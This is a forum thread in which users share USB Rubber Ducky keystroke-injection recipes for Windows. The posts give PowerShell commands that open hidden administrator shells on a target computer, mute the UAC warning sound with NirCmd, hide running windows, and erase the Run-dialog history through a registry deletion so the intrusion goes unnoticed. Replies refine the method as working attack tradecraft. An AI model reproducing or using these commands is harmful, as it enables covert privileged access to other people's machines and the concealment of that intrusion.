SilentHacker Posted September 8, 2015 Share Posted September 8, 2015 Hi! Before anything else, I should mention that I am new to all of this (my Rubber Ducky hasn't even arrived yet), but I've been digging around and I think I've come up with a pretty decent alternative to hiding windows in Windows (without having them scroll down and out of sight, which is very unstealth-like). Like I've mentioned, my Rubber Ducky hasn't arrived yet, so I haven't gotten around to learning the script to its fullest for that reason I'm going to be sharing what the ducky should do, step-by-step, instead of the actual inject.bin. The Stealth enhancer: After having the Ducky open the run command (GUI + R) instead of having it write something like "cmd" or "powershell", give this a try and see for yourself: powershell -windowstyle hidden start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit Now you have to make the ducky go LEFT and ENTER to accept opening powershell as administrator. You can still catch a few glimpses of the 2 powershell windows that get open, but they immediately disappear. Although it's not visible, one of the windows IS STILL OPEN so long as you don't click anywhere else. To prove that the powershell running as administrator is still open, type this out (without quotes,it's important that you type it): "start-process notepad.exe", this will open the notepad. This works fine all my computers (Windows 8 and 10), I'm not sure about others, please let me know. Removing the "Run as Admin" sound: Some computers have this annoying warning sound when the box to confirm to run something as admin pops-up. This sound is specially annoying if you want to go undetected. There are two alternatives: 1) You could make the Ducky type "FN + ESC", this will mute or unmute the computer. The problem with this option is that, if the target computer is already muted, this will produce the contrary effect of the desired one. So if you are using this one, make sure the target computer is not muted. 2) For this one we need the help of a tool called NirCmd, this tool is, I believe, a great asset for the Rubber Ducky users. The potential for pranks is enormous. Here's what to do: - First of all, you should get NirCmd: http://www.nirsoft.net/utils/nircmd.zip - Unzip the file and copy the "nircmd.exe" or "nircmd" to the Rubber Ducky's SD card. - Next make the Rubber Ducky run this after (GUI + R): powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit What this does is open a hidden powershell, mutes the system, the dialog box pops up, a hidden administrator run powershell opens (closing the previous one) and restores sound to the system. Alternatively, you could run this (if you don't want to restore sound to the system and keep it muted): powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit WARNING: Make sure to change "F:/nircmd/nircmd.exe" to whatever path your nircmd.exe file has on your ducky. Other applications for nircmd: - open and hide apps. (Open notepad and hide it, but it remains active and you can write whatever you want as long as you don't click anywhere else) start-process notepad.exe; F:/nircmd/nircmd.exe win hide class notepad I don't know the full extent of this "hide" feature I tried it with google chrome, but I didn't know the "class" so it didn't work. Play around with it and let me know. - show hidden apps. F:/nircmd/nircmd.exe win show class notepad - Make the computer read a text file (Cool Prank) F:/nircmd/nircmd.exe speak file "c:\temp\speak.txt" This is all I have had time to play with in the past few days, please point out any mistakes I might have made and let me know on your ideas. Play around with NirCmd's other features and share it here. Sorry for the messy post. Quote Link to comment Share on other sites More sharing options...
LukasS Posted September 9, 2015 Share Posted September 9, 2015 Well done :) It works ... You should do more resources like this ... thank you :D Quote Link to comment Share on other sites More sharing options...
sud0nick Posted September 9, 2015 Share Posted September 9, 2015 Great job on finding the windowstyle hidden argument for PowerShell. I'm not sure your idea with nircmd will work because the ducky doesn't mount as a drive on a computer. It registers as a HID only. Maybe something like Twin Duck will help make this work. Quote Link to comment Share on other sites More sharing options...
LukasS Posted September 9, 2015 Share Posted September 9, 2015 (edited) Great job on finding the windowstyle hidden argument for PowerShell. I'm not sure your idea with nircmd will work because the ducky doesn't mount as a drive on a computer. It registers as a HID only. Maybe something like Twin Duck will help make this work. It works with Twin Duck ... Edited September 9, 2015 by LukasS Quote Link to comment Share on other sites More sharing options...
SilentHacker Posted September 9, 2015 Author Share Posted September 9, 2015 I've noticed that the script that mutes and restores sound to the system loses track- so to speak- of the powershell window. powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit To solve this, you should use the one that just mutes the system and afterwards make the ducky type the script that returns the sound: powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit (And then make the ducky type:) F:/nircmd/nircmd.exe mutesysvolume 0 Since at this point, the window is already hidden, there should be no rush to unmute the system. And this way, the ducky can continue typing in the powershell whatever you want it to. Again: Do remember to change the " F:/nircmd/nircmd.exe" to the actual path of the file on your ducky. Thank you for the feedback, and thank you for pointing out the need for the Twin Duck firmware. Always happy to help :) Quote Link to comment Share on other sites More sharing options...
LukasS Posted September 10, 2015 Share Posted September 10, 2015 (edited) Just one point ... you need to clear the text on GUI + R after the job done ... how will you make it ? Edited September 10, 2015 by LukasS Quote Link to comment Share on other sites More sharing options...
SilentHacker Posted September 10, 2015 Author Share Posted September 10, 2015 To erase the run command history, simply make the ducky type this in the powershell: reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f This will erase ALL of the history, not just what the ducky did. But no one should notice and even if they do, they shouldn't find it suspicious. To give credit where credit is due: Source Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.